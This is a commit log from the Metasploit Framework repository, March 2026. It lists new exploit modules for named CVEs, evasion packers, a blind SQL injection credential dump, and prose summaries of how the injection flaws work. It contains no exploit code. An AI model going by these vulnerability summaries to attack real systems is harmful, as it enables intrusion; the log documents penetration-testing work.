Jack Heysel a4a34410c7 Mech type update for ruby_smb 2026-03-18 11:18:28 -07:00
SaiSakthidar 76b6d8b161 Update PHP meterpreter socket channel acceptance expectations 2026-03-18 17:49:13 +00:00
SaiSakthidar 929c977fcf Update PHP meterpreter socket channel acceptance expectations 2026-03-18 17:43:46 +00:00
jenkins-metasploit a1fa54e3d4 automatic module_metadata_base.json update 2026-03-17 22:53:26 +00:00
Spencer McIntyre 09bb0337d1 Merge pull request #20997 from Nayeraneru/OptTD
Introduce OptTimedelta
2026-03-17 18:41:42 -04:00
Spencer McIntyre 8b26a28c3e Merge pull request #21139 from jheysel-r7/fix/ldap_esc_version_check
Fix version check in ldap_esc_vulnerable_cert_finder
2026-03-17 18:34:34 -04:00
Nayeraneru 01d88791d2 Removed unnecessary code and module 2026-03-18 00:14:15 +02:00
Jack Heysel d47a41c732 Fix version check in ldap_esc_vulnerable_cert_finder 2026-03-17 12:03:10 -07:00
jenkins-metasploit bf13628b34 automatic module_metadata_base.json update 2026-03-17 13:40:47 +00:00
adfoster-r7 789b29d4e7 Merge pull request #21124 from adfoster-r7/improve-payload-size-generation-script
Improve payload size generation script
2026-03-17 13:31:04 +00:00
Jack Heysel 143071ab36 Refactor duplicate code 2026-03-16 19:59:46 -07:00
Jack Heysel e0a4b969ae Add support for simplified single target relaying (smbclient) 2026-03-16 19:42:17 -07:00
adfoster-r7 3768efbacc Improve payload size generation script 2026-03-16 22:06:39 +00:00
BootstrapBool 31b58e7deb msftidy changes 2026-03-14 23:38:04 -04:00
BootstrapBool 5b9dc0f5ed Merge branch 'master' into camaleon_cms_cve_2024_46987 2026-03-14 23:33:27 -04:00
BootstrapBool aa2725150c Removes python camaleon module, adds ruby camaleon module
Updates documentation
2026-03-14 23:32:44 -04:00
Valentin Lobstein 3414611a3d Refactor: Use inherited SSL option from HttpClient instead of HTTPSSL 2026-03-14 00:07:28 +01:00
Valentin Lobstein c5c6c34232 Refactor: Remove HTTPSSL option, auto-detect SSL from port 443 2026-03-14 00:04:49 +01:00
Valentin Lobstein d01a2689bb Fix: Use HttpClient bind_call for full HTTP feature inheritance
Replace standalone Rex::Proto::Http::Client with bind_call on
HttpClient's connect method to bypass SMTPDeliver MRO conflict
while preserving SSL, proxy, basic auth, and vhost support.
Add HTTPSSL option for HTTPS targets.
2026-03-14 00:02:04 +01:00
Valentin Lobstein db3654eebf Fix: Address Copilot review feedback and fix cmd/dropper targets
- Fix http_send: use standalone Rex::Proto::Http::Client to avoid
  SMTPDeliver/HttpClient connect() method conflict
- Fix cmd/dropper PHP stub: remove double $$ variable (vars[:cmd_varname]
  already includes $ prefix)
- Fix cmd/dropper unlink: use cleanup POST param instead of inline
  @unlink to preserve shell across multiple stager requests
- Fix wait_for_cron: use .to_i % fetch for correct modulo calculation
- Fix dir_exists?: use res&.redirect? instead of res&.code == 301
- Fix docs: RHOSTS -> RHOST (SMTPDeliver registers singular RHOST)
- Remove manual Date header (SMTPDeliver handles it)
- Update scan_paths comment to reflect MD5 digit extraction
- Replace php_exec_cmd with manual preamble + system_block stub
2026-03-13 23:38:30 +01:00
Valentin Lobstein 8ad5924bf1 Fix: Use parent of fix commit (78178d1~1) for vulnerable Encoder checkout 2026-03-13 22:59:51 +01:00
Valentin Lobstein 8d44dcd1fb Fix: Lab setup documentation for first-time environments
- Fix DB permissions (bind mount creates files as www-data instead of mysql)
- Force table creation (cli.php skips it when configuration.php already exists)
- Revert entire Encoder working tree, not just getImage.php (78178d1 patched multiple files)
- Run git checkout from inside the container to avoid safe.directory issues
2026-03-13 22:55:23 +01:00
Spencer McIntyre 35d2906c2a Update grammar fix CWE ID 2026-03-13 09:52:49 -04:00
Spencer McIntyre 29655b0b3f Expand the private_type definition logic 2026-03-13 09:50:19 -04:00
adfoster-r7 fed897ae72 Merge pull request #21074 from jeanmtr/pop3_login-doc
Docs for pop3_login
2026-03-13 11:28:24 +00:00
jenkins-metasploit 29d876e38c automatic module_metadata_base.json update 2026-03-13 10:10:52 +00:00
msutovsky-r7 b3aa45fb09 Land #20719, adds module for authenticated command injection in FreePBX filestore (CVE-2025-64328)
Add authenticated RCE module for FreePBX filestore (CVE-2025-64328)
2026-03-13 11:00:43 +01:00
jenkins-metasploit ee3d2da6e8 automatic module_metadata_base.json update 2026-03-13 00:33:09 +00:00
adfoster-r7 510ec29a63 Merge pull request #21046 from msutovsky-r7/exploit/beyondtrust/updates_description
Updates description for BeyondTrust command injection
2026-03-13 00:23:40 +00:00
adfoster-r7 fa75987326 Merge pull request #21024 from Aaditya1273/fix-msfrpcd-json-rpc-ssl-check-21022
Fix #21022: msfrpcd JSON-RPC SSL certificate check logic
2026-03-13 00:13:27 +00:00
adfoster-r7 efa1c8b1cd Merge pull request #21028 from SilentSobs/fix/reload-all-unknown-command
Fix reload_all failing with unknown command reload
2026-03-13 00:10:00 +00:00
adfoster-r7 c882d91155 Merge pull request #21025 from Hemang360/cookie-jar-doc-fix
Fix HttpCookie integer conversion and cookie jar docs
2026-03-13 00:08:13 +00:00
adfoster-r7 2bd9356044 Merge pull request #21081 from Hemang360/fix-utf8-encoding
Fix msfvenom UTF-8 encoding error
2026-03-13 00:07:29 +00:00
Spencer McIntyre 7a7db966c3 Merge pull request #21020 from g0tmi1k/docs
Running-Private-Modules.md: Remove duplicate lines
2026-03-12 17:25:21 -04:00
Curt Hyvarinen 488cd0f9eb remove test artifact 2026-03-12 13:41:50 -07:00
Curt Hyvarinen a56e0d0259 Remove require rubygems/package, use Rex::Tar::Writer for monkey-patch 2026-03-12 13:24:56 -07:00
Curt Hyvarinen 63561130af Address PR review feedback for CVE-2023-2868 module 2026-03-12 12:59:30 -07:00
jenkins-metasploit 019b857a2b automatic module_metadata_base.json update 2026-03-12 19:58:09 +00:00
Valentin Lobstein ee2ee34b9e Refactor: Extract shared logic in exploit method for openDCIM module
Factor out duplicated print_status and backup_config calls, extract
trigger_exec and cleanup_config helpers for readability.
2026-03-12 20:56:33 +01:00
Spencer McIntyre ccf56437da Merge pull request #20960 from g0tmi1k/dhcp_server
dhcp_server: Add DHCPINTERFACE
2026-03-12 15:48:36 -04:00
Valentin Lobstein f34a0b5d31 Fix: Address PR review feedback for openDCIM module
Add ARTIFACTS_ON_DISK side effect and fetch payload note in docs.
2026-03-12 20:44:19 +01:00
g0t mi1k 33eb773a4d dhcp_server: Check to validate for _determine_server_comm
Untested - As requested by @smcintyre-r7
2026-03-12 17:29:21 +00:00
g0t mi1k 6a831a0f58 autoroute.rb: OptAddress NETMASK - Drop CIDR
Credit: @smcintyre-r7

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-03-12 16:41:25 +00:00
g0t mi1k f7c4aac453 OptAddress -> OptAddressLocal 2026-03-12 16:41:25 +00:00
g0t mi1k 3852276028 OptString -> OptAddressLocal 2026-03-12 16:41:25 +00:00
g0t mi1k b2f1e46c82 OptString -> OptAddress 2026-03-12 16:41:25 +00:00
Valentin Lobstein 5150a4b68b Docs: Clarify that .compose/encoder is a clone of AVideo-Encoder repo
The commit c9861e9c exists in WWBN/AVideo-Encoder (not WWBN/AVideo).
Add a note explaining that .compose/encoder is a git clone created by
the container entrypoint, with a link to the correct repository.
2026-03-11 22:05:23 +01:00
Valentin Lobstein 38e74740f3 Fix: Use correct commit hash for vulnerable getImage.php in lab setup
The previous commit (e0c2768) did not touch getImage.php. Use c9861e9c
which is the last commit before the security patch (78178d1) that
modifies the file.
2026-03-11 21:23:27 +01:00
Valentin Lobstein 16b55848b4 Fix: Remove duplicate Content-Type header from FreePBX requests
send_request_cgi already sets Content-Type when vars_post is used.
Setting it manually in headers causes a duplicate header.
2026-03-11 20:09:52 +01:00
Valentin Lobstein 2b0f1c3c21 Fix: Omit default port from Referer header in FreePBX mixin
FreePBX rejects ajax requests when the Referer includes :80 for HTTP
or :443 for HTTPS. Only include the port when it differs from the
protocol default.
2026-03-11 20:06:08 +01:00
Valentin Lobstein 6467b7261d Fix: Auto-provision admin user and fix filestore version downgrade in lab 2026-03-11 19:45:14 +01:00
Valentin Lobstein f59024ce90 Add authenticated RCE module for FreePBX filestore (CVE-2025-64328) 2026-03-11 19:44:53 +01:00
Valentin Lobstein d088ab632d Simplify execute_command to take cookie as direct parameter instead of hash 2026-03-11 19:43:29 +01:00
Valentin Lobstein 67642dd9a0 Refactor authenticate method to raise exceptions instead of returning special values 2026-03-11 19:43:29 +01:00
Valentin Lobstein c42e44e349 Optimize FreePBX module: cache auth/version, reduce verbosity, inline single-use functions 2026-03-11 19:43:29 +01:00
Valentin Lobstein 63c5221f8a Update modules/exploits/unix/http/freepbx_filestore_cmd_injection.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-03-11 19:43:29 +01:00
Valentin Lobstein b039d8a575 Update modules/exploits/unix/http/freepbx_filestore_cmd_injection.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-03-11 19:43:29 +01:00
Valentin Lobstein 36b294800b Simplify version extraction: use match directly and remove redundant regex validation 2026-03-11 19:43:28 +01:00
Valentin Lobstein c266e687c2 Add authenticated RCE module for FreePBX filestore (CVE-2025-64328) 2026-03-11 19:43:28 +01:00
jenkins-metasploit 1ff23f1061 automatic module_metadata_base.json update 2026-03-11 15:46:15 +00:00
Christophe De La Fuente 31665e1b88 Land #20730, Allow toggling the SACL in LDAP queries
# Release Notes
This update modifies the ldap_query module to skip querying the SACL (System Access Control List) on security descriptors by default. This behavior is now controlled by a new option, LDAP::QuerySacl. This change is necessary when using a non-privileged user to query security descriptors via LDAP; otherwise, querying the SACL will cause the entire query to be blocked, resulting in no security descriptors being returned.
2026-03-11 16:36:35 +01:00
g0t mi1k 51451cd58d *FTPD naming consistency 2026-03-11 14:19:23 +00:00
g0t mi1k 47518cabc6 auxiliary/scanner/ftp/anonymous: Improve report_service()
Previously would only log service if FTP service was working AND anonymous enabled.
Now it will log if FTP service is working regardless of anonymous.

Note, will NOT include the FTP banner when anonymous is enabled. Only disabled!
2026-03-11 14:16:21 +00:00
LucasCsmt 3f25048d9b Merge branch 'master' into multi/http/churchcrm_db_restore_rce 2026-03-11 09:41:33 +01:00
LucasCsmt 4ebef4b3e2 Changing a letter in order to have conformity 2026-03-11 09:14:14 +01:00
x1o3 146911bb3d rubocop & msftidy compiant 2026-03-11 12:59:36 +05:30
x1o3 de72dcb88a fixes review feedback 2026-03-11 12:56:14 +05:30
jenkins-metasploit 8ab51cfafc Bump version of framework to 6.4.123 2026-03-10 21:40:43 +00:00
jenkins-metasploit 777ce59119 automatic module_metadata_base.json update 2026-03-10 20:31:01 +00:00
adfoster-r7 50fe3a5301 Merge pull request #21094 from adfoster-r7/revert-choose-encoder-updates
Revert choose encoder updates
2026-03-10 20:21:29 +00:00
FutileSkills 1f8dd57f79 Update CVE reference for ESC/POS command injector 2026-03-10 14:25:08 -05:00
adfoster-r7 eba2c59f71 Revert "Land #20852, exposes encoder options for exploit and payloads"
This reverts commit 96958dedbb, reversing
changes made to 8e03b6e98a.
2026-03-10 19:03:51 +00:00
adfoster-r7 4f9b9d5dac Revert "Land #21088, Fix base64 encoder"
This reverts commit 437f738754, reversing
changes made to e6ee6a7c94.
2026-03-10 19:02:20 +00:00
Spencer McIntyre 7dcec2e0cb Switch to false by default 2026-03-10 14:57:54 -04:00
Brendan 5092b21717 Merge pull request #20885 from dledda-r7/feat/unix_bind_netcat_update
Add support for short command execution in bind_netcat module
2026-03-10 12:34:54 -05:00
gregd 1f55aa724a Apply reviewer feedback: CheckCode::Appears, ARTIFACTS_ON_DISK, simplify connect
- Use CheckCode::Appears instead of CheckCode::Vulnerable per convention
  - Add ARTIFACTS_ON_DISK to SideEffects for dropper target
  - Simplify connect call by removing unnecessary uri argument
2026-03-10 13:07:03 +00:00
jenkins-metasploit 04ff6f8767 automatic module_metadata_base.json update 2026-03-10 10:43:17 +00:00
Christophe De La Fuente 437f738754 Land #21088, Fix base64 encoder 2026-03-10 11:25:04 +01:00
jbx81-1337 e341db58f7 fix: default option for base64 encoder 2026-03-10 10:18:07 +01:00
msutovsky-r7 e6ee6a7c94 Land #20961, adds service reporting to Wordpress mixin
Update Wordpress Mixin to log services
2026-03-10 09:05:05 +01:00
jenkins-metasploit fef03d3bb7 automatic module_metadata_base.json update 2026-03-09 15:50:07 +00:00
Diego Ledda b18611c1d9 Merge pull request #20966 from litemars/add_Linux_evasion_module-rc4_packer_x64
adding RC4 packer x64, rc4 decrypt routine and sleep evasion routine
2026-03-09 10:55:44 -04:00
jenkins-metasploit 9283a25efb automatic module_metadata_base.json update 2026-03-09 14:44:26 +00:00
Diego Ledda 1af0a49729 Merge pull request #21002 from Chocapikk/add-module-leakix-search
Add LeakIX search module with 6 actions and bulk streaming
2026-03-09 10:34:43 -04:00
jenkins-metasploit 4c87d1ac10 automatic module_metadata_base.json update 2026-03-09 09:47:36 +00:00
msutovsky-r7 c6aabc1c75 Land #21001, adds module for SPIP Saisies plugin (CVE-2025-71243)
Add SPIP Saisies plugin RCE module (CVE-2025-71243)
2026-03-09 10:34:52 +01:00
jenkins-metasploit 5482e51832 Bump version of framework to 6.4.122 2026-03-08 19:19:48 +00:00
jenkins-metasploit 20473f411b automatic module_metadata_base.json update 2026-03-08 18:17:17 +00:00
adfoster-r7 2d908fe601 Merge pull request #21083 from rapid7/revert-20989-feat/lib/mod-address-opts
Revert "This adjusts module options that need a routable address"
2026-03-08 18:06:29 +00:00
adfoster-r7 628275ef59 Revert "This adjusts module options that need a routable address" 2026-03-08 17:37:49 +00:00
BootstrapBool 25f6f6b7ae Moves camaleon_traversal module to auxiliary/gather
Adds missing options to documentation

Makes verbose option not required

Changes VHOST option type - some reason "address" type domain names were
marked as "invalid"
2026-03-07 18:36:36 -05:00
jenkins-metasploit ef7992713a Bump version of framework to 6.4.121 2026-03-07 19:27:42 +00:00
adfoster-r7 f9b47d421f Merge pull request #21070 from adfoster-r7/update-metasploit-data-models
Update metasploit data models
2026-03-07 19:19:14 +00:00
Hemang360 f09143998a Fix incompatible encoding error when command contains utf-8 characters 2026-03-07 20:50:41 +05:30
BootstrapBool d65cc5694f Adds camaleon_traversal module/documentation 2026-03-06 23:16:52 -05:00
Valentin Lobstein a66a8788d9 Docs: Add GHSA, OSV, and ATT&CK reference examples 2026-03-07 04:27:23 +01:00
Valentin Lobstein 6154d53e9a Fix: Use short PHP variable for fetch payload to reduce size
Use a randomized variable name to store the file path instead of
repeating the full path inline. Remove unnecessary spaces between
PHP statements.
2026-03-07 03:59:42 +01:00
Valentin Lobstein 9283072822 Fix: Rubocop style fixes for churchcrm module 2026-03-07 02:57:05 +01:00
Valentin Lobstein 3eb814de90 Fix: Refactor ChurchCRM unauthenticated RCE module
- Upgrade rank to ExcellentRanking, prepend AutoCheck
- Add vulnerability discoverer Arthur Valverde (uartu0) to authors
- Fix GHSA reference format with repo parameter
- Replace InitialAutoRunScript with inline unlink(__FILE__) for PHP
  targets and post-staging rm for CmdStager target
- Randomize DB_SERVER_PORT and GET parameter name
- Simplify check method, extract setup_uri, DRY build_config_payload
- Remove redundant register_options for TARGETURI
2026-03-07 02:34:58 +01:00
Valentin Lobstein f27318b54b Fix: Resolve rubocop lint issues in avideo_catname_sqli
Remove extra blank line, rename @sqli to @setup_sqli to match
memoized method name convention.
2026-03-07 00:17:37 +01:00
Valentin Lobstein a277de1308 Fix: Correct version in documentation scenario title 2026-03-07 00:13:10 +01:00
Valentin Lobstein ba183d456d Fix: Remove BenchmarkProbeIterations from global SQLi options
MySQL-specific option should not pollute all SQLi modules.
Hardcode probe iteration count in BenchmarkBasedBlind instead.
2026-03-07 00:09:44 +01:00
Valentin Lobstein 62f4687cb4 Add AVideo catName blind SQLi credential dump (CVE-2026-28501)
Add auxiliary/gather/avideo_catname_sqli module exploiting unauthenticated
SQL injection via JSON body in objects/videos.json.php. Uses BENCHMARK()
time-based blind injection since SLEEP() is blocked by sqlDAL prepare().

Add MySQLi::BenchmarkBasedBlind class with auto-calibrated BENCHMARK()
iterations using real table subqueries to match extraction workload cost.

Refactor blind_detect_length and blind_dump_data from bit-by-bit extraction
to binary search (bisection), avoiding bitwise & operator issues with
prepare() and matching sqlmap's extraction strategy.

Extract test_vulnerable into TimeBasedBlindMixin, add overridable
time_blind_payload and sleep_call methods for clean subclass override.

Fix pre-existing rubocop issues in touched mixin files (Style/Documentation,
OptionalBooleanParameter, MultilineBlockChain, TrailingWhitespace).
2026-03-07 00:07:52 +01:00
jeanmtr e369660d18 Update pop3_login.md
Another md issue
2026-03-06 22:53:11 +01:00
jeanmtr 81431ea680 Update pop3_login.md
markdown issue
2026-03-06 22:51:26 +01:00
jeanmtr d2812ae9fc add documentation for the pop3_login.md module 2026-03-06 22:40:57 +01:00
Hemang360 1aab8ec385 Fix duplicate handler jobs on repeated run 2026-03-07 02:52:14 +05:30
Valentin Lobstein dfe73bb4c5 Add exploit for AVideo Encoder getImage.php command injection (CVE-2026-29058)
Unauthenticated OS command injection via the base64Url parameter in
getImage.php. The URL is interpolated into an ffmpeg shell command
without escapeshellarg(), and FILTER_VALIDATE_URL does not block
shell metacharacters in the URL path.
2026-03-06 21:30:12 +01:00
adfoster-r7 3de421f8f5 Update metasploit data models 2026-03-06 14:12:56 +00:00
LucasCsmt 4ca2b22dff Adding documentation to the module 2026-03-06 10:18:58 +01:00
LucasCsmt 6026e9f971 Correcting the version and the CVE code 2026-03-06 10:18:25 +01:00
bwatters-r7 34cc1a663c Also remove ms_icpr_spec that had the same tests as the other spec file removed before 2026-03-05 15:44:20 -06:00
bwatters-r7 f2e98c76d8 Move specs for create_csr and build_on_belhalf_of to new location since we moved them. 2026-03-05 15:19:31 -06:00
Spencer McIntyre 400b2d7eb8 Update the specs 2026-03-05 13:56:17 -05:00
Spencer McIntyre 3a4c4ec7c3 Allows parents to be an existing Mdm::Service 2026-03-05 12:51:55 -05:00
Valentin Lobstein 9b7faea3c2 Feat: Add FreeScout ZWSP .htaccess RCE module (CVE-2026-28289) 2026-03-05 18:06:32 +01:00
jenkins-metasploit 440466e057 automatic module_metadata_base.json update 2026-03-05 16:56:35 +00:00
Diego Ledda 1ec87b586a Merge pull request #20989 from zeroSteiner/feat/lib/mod-address-opts
This adjusts module options that need a routable address
2026-03-05 11:46:52 -05:00
jenkins-metasploit 401a46da2f Bump version of framework to 6.4.120 2026-03-05 15:35:59 +00:00
jenkins-metasploit 3f4a6cca6c automatic module_metadata_base.json update 2026-03-05 14:49:28 +00:00
msutovsky-r7 59a1992214 Land #21017, adds module for SSTI in Tactical RMM (CVE-2025-69516)
Add Tactical RMM Jinja2 SSTI RCE module (CVE-2025-69516)
2026-03-05 15:38:32 +01:00
Spencer McIntyre 7ff46b818f Fix a missing argument in #report_icertpassage_service 2026-03-05 09:37:29 -05:00
Valentin Lobstein 3d38e9b27b Fix: Fallback check to Detected when plugin version unavailable
- Use spip_version as fallback when spip_plugin_version fails
- Return Detected instead of Unknown so AutoCheck does not abort
- Fix lab healthcheck to wait for saisies form before reporting healthy
2026-03-05 14:13:05 +01:00
Valentin Lobstein 4534a8a07e Fix: Address msutovsky-r7 PR review feedback
- Add IOC_IN_LOGS to SideEffects (POST payload may appear in app logs)
- Pass page parameter via vars_get instead of embedding in URI string
- Apply vars_get consistently in crawl seed request
2026-03-05 14:07:22 +01:00
Valentin Lobstein bf41455bca Fix: Address review feedback - remove dead execute_command, fix dropper race condition 2026-03-05 14:01:12 +01:00
g0t mi1k 2eb160add6 dhcp_server: Add DHCPINTERFACE 2026-03-04 22:09:14 +00:00
Spencer McIntyre 6111968826 Log attributes with 'password' as passwords 2026-03-04 14:47:36 -05:00
Spencer McIntyre 7420d21f12 Report the full service chains 2026-03-04 13:34:23 -05:00
Spencer McIntyre 0faa0bd36b Add the #ldap_client_ssl alias 2026-03-04 13:15:33 -05:00
Valentin Lobstein 77df1f1e87 Fix: Revert action-specific options to non-required with manual validation
Option conditions control display but required:true still triggers
validation across all actions. Reverted QUERY, TARGET_IP, TARGET_DOMAIN
to required:false and re-added case/when validation in validate method.
2026-03-04 17:13:03 +01:00
Brendan a64404717a Merge pull request #7 from smcintyre-r7/pr/collab/20752
Web Enrollment Tweaks
2026-03-04 09:41:32 -06:00
LucasCsmt 9d7556e3a8 Altering the 'start_service' emplacement 2026-03-04 15:38:10 +01:00
LucasCsmt 4a0957e68b Altering the status code check 2026-03-04 15:30:56 +01:00
LucasCsmt c137331090 Enhancing the check method 2026-03-04 15:29:00 +01:00
Valentin Lobstein 6a97083e3b Refactor: Use option conditions for action-specific validation 2026-03-04 15:23:27 +01:00
LucasCsmt 720004a33e Adding upload of payload and execution 2026-03-04 15:21:12 +01:00
LucasCsmt 040cabd249 Adding a function that get the cookie 2026-03-04 13:47:06 +01:00
LucasCsmt 8dbc764730 Adding a check function and build_payload
I added a check function that check if the server is accessible and
vulnerable. I added also a build_payload function that build the php
file that will be executed by the vulnerable host.
2026-03-04 10:39:59 +01:00
jenkins-metasploit 16600d5439 automatic module_metadata_base.json update 2026-03-04 09:11:36 +00:00
msutovsky-r7 96958dedbb Land #20852, exposes encoder options for exploit and payloads
Expose encoder options
2026-03-04 10:01:29 +01:00
h00die 28c8cf7a14 better wriable_dir for windows persistence 2026-03-03 20:29:51 -05:00
Martin Sutovsky 9c7264b48f Updates description 2026-03-03 15:42:15 +01:00
Spencer McIntyre da04abac19 Appease rubocop 2026-03-03 09:38:23 -05:00
Spencer McIntyre 4b616dd00b Report where creds are coming from 2026-03-03 09:38:23 -05:00
Spencer McIntyre 0a86601049 Report vulns in LDAP #check methods 2026-03-03 09:38:23 -05:00
Spencer McIntyre c5b9157c61 Update MsIcpr service reporting too 2026-03-03 09:38:23 -05:00
Spencer McIntyre c9d14ef449 Update ESC reported services and findings 2026-03-03 09:38:23 -05:00
Spencer McIntyre 3addd472a7 Report the LDAP service 2026-03-03 09:38:23 -05:00
Spencer McIntyre 36ba1608af Remove more unnecessary my_host definitions 2026-03-03 09:37:27 -05:00
Spencer McIntyre bd5152f10a Clean up my_host definition in IE exploit 2026-03-03 09:37:27 -05:00
Spencer McIntyre ea915acba3 Appease rubocop 2026-03-03 09:37:27 -05:00
Spencer McIntyre 1b39311784 Remove redundant definitions of SRVHOST 2026-03-03 09:37:27 -05:00
Spencer McIntyre 821e3c28f1 Replace old patterns with srvhost_addr 2026-03-03 09:37:27 -05:00
Spencer McIntyre 132ef661d3 Update usage within binding operations 2026-03-03 09:37:27 -05:00
Spencer McIntyre 6e38f8568c Update tftphost usage in cmd stagers 2026-03-03 09:37:27 -05:00
Spencer McIntyre b7fc0c6613 Replace usage of #lookup_lhost 2026-03-03 09:37:27 -05:00
Spencer McIntyre fc3176ca0d SRVHOST isn't defined here, use DNS 2026-03-03 09:37:27 -05:00
Spencer McIntyre 3f2a07bdca Update #make_steal_credentials_payload to just take url 2026-03-03 09:37:27 -05:00
Spencer McIntyre 1b528c78f0 Swap usages to #bindhost and #srvhost_addr 2026-03-03 09:37:26 -05:00
Spencer McIntyre 18bdbfa402 Update instances of #backend_url to use #get_uri 2026-03-03 09:37:26 -05:00
Spencer McIntyre 83a82ed043 Remove the extra argument 2026-03-03 09:37:26 -05:00
adfoster-r7 9df6879a95 Update modules to use srvhost method 2026-03-03 09:37:25 -05:00
adfoster-r7 c87d6519da Add linting rule 2026-03-03 09:34:49 -05:00
Spencer McIntyre 514bb88962 Fix java payload cached sizes 2026-03-03 09:34:49 -05:00
Spencer McIntyre 2dca4cb13f Set LHOST to a large unicast address for caching
LHOST needs to be an address that can hypothetically be bound to per the
new option validation which the broadcast options are not. The caching
should use the largest address available though, so keep it as a long
address.
2026-03-03 09:34:49 -05:00
Spencer McIntyre 758ac7f2f6 Apply rubocop changes 2026-03-03 09:34:49 -05:00
Spencer McIntyre 43931afb41 Allow routable addresses to be the local interface 2026-03-03 09:34:49 -05:00
Spencer McIntyre fc49421939 Replace checks for nonroutable addresses
This consolidates modules that check for a nonroutable SRVHOST value and
replaces it with OptAddressRoutable, defaulting to a reasonable address.
2026-03-03 09:34:49 -05:00
Spencer McIntyre a0fb02bd45 Default the address in the SMB share mixin 2026-03-03 09:34:49 -05:00
Spencer McIntyre bd09d28b4e Do a bit more IPv4 validation 2026-03-03 09:34:49 -05:00
Spencer McIntyre 92e77de800 Update to use OptAddressRourtable for SRVHOST 2026-03-03 09:34:48 -05:00
jenkins-metasploit 8e03b6e98a Bump version of framework to 6.4.119 2026-03-03 10:47:34 +00:00
adfoster-r7 e1617cb453 Merge pull request #21045 from adfoster-r7/ensure-nessus-icmp-vulns-are-registered
Ensure nessus icmp vulns are registered
2026-03-03 10:40:21 +00:00
adfoster-r7 e05ab29729 Ensure nessus icmp vulns are registered 2026-03-03 09:54:33 +00:00
jenkins-metasploit ce1fa5ef69 automatic module_metadata_base.json update 2026-03-03 09:48:12 +00:00
Diego Ledda 38dbefecfc Merge pull request #20965 from litemars/add_Linux_evasion_module-rc4_packer_x86
adding RC4 packer x86, rc4 decrypt routine and sleep evasion routine
2026-03-03 04:36:51 -05:00
Nayeraneru 4b363017ef minor change for CI 2026-03-03 06:24:42 +02:00
Brendan 9ea5a54fe9 Merge pull request #20940 from g0tmi1k/twiki_search
twiki_search: Fix exploit, more verbose, error handling, add fetch payload support
2026-03-02 17:55:50 -06:00
jenkins-metasploit b874f89425 Bump version of framework to 6.4.118 2026-03-02 20:56:10 +00:00
adfoster-r7 88216de58b Merge pull request #21044 from adfoster-r7/fix-nessus-service-import-crash
Fix nessus service import crash
2026-03-02 20:45:09 +00:00
jenkins-metasploit ffceb5b777 automatic module_metadata_base.json update 2026-03-02 20:08:10 +00:00
Brendan 9664ab5191 Merge pull request #20946 from g0tmi1k/twiki_history
twiki_history: Add revision+page options & Fetch payload support
2026-03-02 13:58:44 -06:00
adfoster-r7 f1cbb90194 Fix nessus service import crash 2026-03-02 19:43:36 +00:00
jenkins-metasploit 32e2ac84bc automatic module_metadata_base.json update 2026-03-02 16:29:05 +00:00
adfoster-r7 6ad9735889 Merge pull request #20987 from sjanusz-r7/ldap-sessions-working-for-more-modules
LDAP sessions working for Kerberoast and AS-REP modules
2026-03-02 16:19:29 +00:00
sjanusz-r7 ccc8367db5 Working Kerberoast and AS-REP modules with LDAP sessions 2026-03-02 15:33:36 +00:00
jenkins-metasploit 449b072f77 automatic module_metadata_base.json update 2026-03-02 15:28:31 +00:00
cgranleese-r7 9da70e511f Merge pull request #21042 from adfoster-r7/fix-broken-module-url-references
Fix broken module url references
2026-03-02 15:19:01 +00:00
adfoster-r7 7545328be1 Linting 2026-03-02 15:02:56 +00:00
adfoster-r7 1a4ae7bfa3 Fix broken module url references 2026-03-02 14:35:48 +00:00
x1o3 f87a5d9598 fixes review feedback 2026-03-02 17:38:14 +05:30
jenkins-metasploit b06d57d155 automatic module_metadata_base.json update 2026-03-02 10:29:55 +00:00
Diego Ledda 6f84c83135 Merge pull request #21000 from Chocapikk/add-modules-majordomo-rce
Add three MajorDoMo unauthenticated RCE modules
2026-03-02 05:20:22 -05:00
LucasCsmt 2d58156aaa Initialisation of the module file
This commit contain the initialisation of the module file including a
description, all the target and options that this module will need.
2026-03-02 10:47:07 +01:00
Hemang Bhagat bfbc425469 Remove type check
Co-authored-by: gardnerapp <70026825+gardnerapp@users.noreply.github.com>
2026-03-01 15:12:44 +05:30
Valentin Lobstein 4aeacb7456 Fix: CmdStager compatibility with dash shell in openDCIM module
PHP exec() uses sh -c which is dash on Ubuntu. Dash echo does not
support -en flag, breaking the echo CmdStager flavor. Switch to
printf (octal) and bourne (base64) flavors which work in dash.

Also split backup_and_poison into backup_config and poison_dot so
CmdStager chunks don't overwrite the backup table, and escape
backslashes in SQL to preserve octal/hex sequences through MySQL.
2026-02-28 21:39:16 +01:00
Valentin Lobstein 2d8c3d69ed Feat: Add openDCIM install.php SQLi to RCE module
Exploits CVE-2026-28515, CVE-2026-28516, CVE-2026-28517 to chain
missing authorization, SQL injection, and command injection in
openDCIM's install.php for remote code execution.
2026-02-28 21:13:51 +01:00
x1o3 7d6d592efe logic fix & cleanup 2026-02-28 22:56:28 +05:30
x1o3 8ba79db6b6 msftidy_docs compliant 2026-02-28 21:30:40 +05:30
x1o3 657e53dcec Add module documentation 2026-02-28 20:59:49 +05:30
ArkaprabhaChakraborty 05f431717e Remove duplicated php filter chains and remove comments from documentation
Signed-off-by: ArkaprabhaChakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-28 12:37:13 +00:00
Curt Hyvarinen 782c1d5455 Add exploit for CVE-2023-2868 Barracuda ESG command injection 2026-02-27 23:29:56 -08:00
Diego Ledda 069dea2296 Apply suggestion from @dledda-r7 2026-02-27 17:04:03 +01:00
litemars c5c67fac56 new line for linter 2026-02-27 16:02:35 +01:00
litemars 003ac7b12d changed description 2026-02-27 15:44:28 +01:00
x1o3 524dd0efe9 rubocop && msftidy compliant 2026-02-27 20:01:55 +05:30
litemars b6acc1fd28 moved rc4_packer to x64 sub-directory 2026-02-27 15:21:04 +01:00
litemars bfe0630ab1 Merge pull request #3 from dledda-r7/collab/feat/x86-rc4-packer
chore: moved rc4_packer to x86 sub-directory, rubocop fix
2026-02-27 15:12:50 +01:00
Ramesh 22b63ae79e Fix reload_all failing with unknown command reload 2026-02-27 19:38:03 +05:30
x1o3 7d57eda229 rubocop && msftidy compliant 2026-02-27 19:36:19 +05:30
Ramesh 53338b6736 fix: correct ARM LE ELF SO entry point alignment
The _start label in the armle ELF shared object template was landing
at offset 0xF6, which is half-word aligned but not word aligned.

ARM A32 requires 4-byte (word) alignment for instruction addresses.
This caused the shared object to fail to load and execute on 32-bit
ARM Linux targets.

Fix: add 2 null padding bytes between strtab and _start, pushing the
